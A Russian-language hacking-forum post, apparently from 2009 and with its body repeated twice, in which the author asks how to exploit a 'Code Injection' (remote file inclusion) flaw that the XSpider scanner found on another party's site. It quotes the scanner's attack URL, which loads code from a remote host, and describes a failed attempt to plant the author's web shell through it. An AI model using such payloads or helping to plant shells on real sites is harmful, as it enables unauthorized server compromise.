diznt
05.01.2009, 16:44
И так я создаю новую тему и не судите меня да не судимы будете (так как мне наврятли ответят в теме специальной) :D лан начнем...
И так насканил (xspider прогой) я тут сайт там обнаружилась серьезная уязвимость с описанием таким вот
" Возможно выполнение атаки "Code Injection". Это может позволить атакующему выполнить произвольный код на вашей системе, взятый с удаленного сервера.
Запрос для выполнения атаки:
http://sait.com/news/?filter=http://wwwwwwww/ "
что еще за код инжект? я сначало подумал(прочитав описание) что нужно указывать путь до шелла вместо "http://wwwwwww/" но указав путь до моего шелла (хост не поддерживает php) шелл был как и в .txt формате как и .php (просто я уже не помню в каком формате надо указывать) у меня ничего не вышло..... Есть какие идеи? Или это не может быть вообще уязв?
И так насканил (xspider прогой) я тут сайт там обнаружилась серьезная уязвимость с описанием таким вот
" Возможно выполнение атаки "Code Injection". Это может позволить атакующему выполнить произвольный код на вашей системе, взятый с удаленного сервера.
Запрос для выполнения атаки:
http://sait.com/news/?filter=http://wwwwwwww/ "
что еще за код инжект? я сначало подумал(прочитав описание) что нужно указывать путь до шелла вместо "http://wwwwwww/" но указав путь до моего шелла (хост не поддерживает php) шелл был как и в .txt формате как и .php (просто я уже не помню в каком формате надо указывать) у меня ничего не вышло..... Есть какие идеи? Или это не может быть вообще уязв?